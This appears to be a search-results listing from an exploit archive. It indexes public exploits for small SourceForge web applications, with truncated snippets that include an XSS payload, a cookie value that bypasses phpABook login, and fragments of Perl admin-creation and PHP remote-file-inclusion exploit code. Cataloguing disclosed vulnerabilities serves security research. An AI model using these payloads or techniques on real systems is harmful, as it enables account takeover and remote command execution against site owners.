25 matches found
Jumbo Website Manager - Remote Code Execution
Exploit Title: Jumbo Website Manager - Remote Code Execution Application: Jumbo Website Manager Version: v1.3.7 Bugs: RCE Technology: PHP Vendor URL: https://sourceforge.net/projects/jumbo/ Software Link: https://sourceforge.net/projects/jumbo/ Date of found: 28.10.2025 Author: Mirabbas Ağalarov...
Webtareas 2.1 / 2.1p Cross Site Scripting
Author: AppleBois Homepage: https://sourceforge.net/projects/webtareas/ Affected Version: 2.1/2.1p Stored XSS Allows an attacker to execute arbitrary HTML and JavaScript code More info : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a Solutions: "NONE" Payload = alert‘AppleBois’;...
CVE-2020-8510
An issue was discovered in phpABook 0.9 Intermediate. On the login page, if one sets a userInfo cookie with the value of admin+1+en user+perms+lang, one can login as any user without a password. Recent assessments: horshark at March 09, 2020 8:27pm UTC reported: CVE in SourceForge project phpABoo...
IP Reg <= 0.4 - Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl ----------------------------------------------- IP Reg = 0.4 Blind SQL Injection Exploit Discovered By StAkeR - StAkeRathotmaildotit Discovered On 03/10/2008 ----------------------------------------------- Download...
netOffice Dwins <= 1.4p3 SQL Injection Vulnerability
No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-11-08 netOffice Dwins = 1.4p3 SQL Injection Vulnerability Script: netOffice Dwins is a free w...
Adult Webmaster PHP - Password Disclosure Vulnerbility
Exploit for php platform in category web applications + Exploit:Adult Webmaster PHP - Password Disclosure + Author: vinicius777 + Email/Twitter: vinicius777 AT gmail @vinicius777 + Vendor Homepage: http://sourceforge.net/projects/adultweb/ 1 Administrative Credential Disclosure PoC:...
FunGamez - Arbitrary File Upload
FunGamez Remote File Upload Vulnerability Brought to you by cr4wl3r http://bastardlabs.info Software Link: http://sourceforge.net/projects/fg-gsm/?source=dlp ----------------------------------------------- Source FunGamez/admin/modules/game.php .......... 135 And your shell will be available here...
PHP Ticket System Beta 1 - Cross-Site Request Forgery
PHP Ticket System Beta 1 - Cross-Site Request Forgery 1. 2. 3. + Exploit Title : php ticket system csrf 4. + Author : Pablo '7days' Riberio 5. + Team: So Good Security 6. + Other 0days : http://pastebin.com/u/7days 7. + Version : = BETA 1 8. + Tested on : windows/internet explorer 9. + Details:...
gComm - Simple Guestbook 0.1 <= Database Backup Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: gComm - Simple Guestbook 0.1 = Database Backup Disclosure Vulnerability Date: 18/7/2012 Author: GoLdM Vendor or Software Link: http://sourceforge.net/projects/gcomm-sg/ Version: 0.1 Category:: Database Backup Disclosure...
eCan 0.1 - Local File Disclosure
eCan 0.1 - Local File Disclosure Exploit Title: eCan v0.1 = Local File Disclosure Vulnerability Date: 11/07/2012 Author: GoLdM Vendor or Software Link: http://sourceforge.net/projects/ecan/ Version: 1.03 Category:: Local File Disclosure Vulnerability2 Tested on: Xp SP 2 Ex : eCan...
PHP Volunteer Management 1.0.2 Cross Site Scripting / SQL Injection
Exploit Title: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities Date: 04/21/12 Author: G13 Twitter: @g13net Software Site: https://sourceforge.net/projects/phpvolunteer/ Version: 1.0.2 Category: webapp php ToC 0x01 Description 0x02 XSS 0x03 SQL Injection 0x04 Vendor Notification 0x01...
SAPID 1.2.3 Remote File Inclusion
Exploit Title: SAPID Stable RFI Google Dork: tanyakan pada dan pemula :D Date: January 08 2011 Author: Opa Yong Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/ Version: SAPID 1.2.3 Stable Tested on: Windows XP Home Edition SP2 @POC:...
SportsPHool 1.0 - Remote File Inclusion
" ."target:" ."evil:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $target.$evil, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $line .= fgets $file, 1024.""; $tpos1 =...
SPAW Editor Local File Inclusion
Exploit Title: local file include Date: Author: soorakh kos Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download Version: SPAW Editor v.2 Thanks: kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys...
Httpdx v1.5.3 Remote Break Server HTTP
Exploit for windows platform in category dos / poc ====================================================================== httpdx v1.5.3 PNG File Handling Remote Denial of Service Vulnerability ====================================================================== Vulnerable: httpdx httpdx 1.5.3...
ASP Product Catalog 1.0 XSS / Disclosure
!/usr/bin/perl By AlpHaNiX NullArea.Net alphaathacker.bz Made in Tunisia script : ASP Product Catalog Multiple Remote Exploits download : http://sourceforge.net/project/showfiles.php?groupid=136315 script homepage : http://aspprocatalog.sourceforge.net/ Vulnerable : XSS : In Search , Example :...
Charrays CMS 0.9.3 - Multiple Remote File Inclusions
--------------------------------------------------------------- / | |\ \ / | / |/ | | |/ \ | | | |||| /| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staffatinj3ct-itdotorg --------------------------------------------------------------- Multiple...
Flip 3.0 - Remote Admin Creation
!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...
Flip <= 3.0 Remoe Admin Creation Exploit
No description provided by source. !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip = 3.0"; my $type = "Admin Creation"; my $author = "undefined1"; my $vendor = "http://sourceforge.net/projects/flipsource"; my %opt; getopts"t:", %opt; $| = 1; print ":: $app $type - by...
Flip <= 3.0 Remoe Admin Creation Exploit
Exploit for unknown platform in category web applications ======================================== Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin...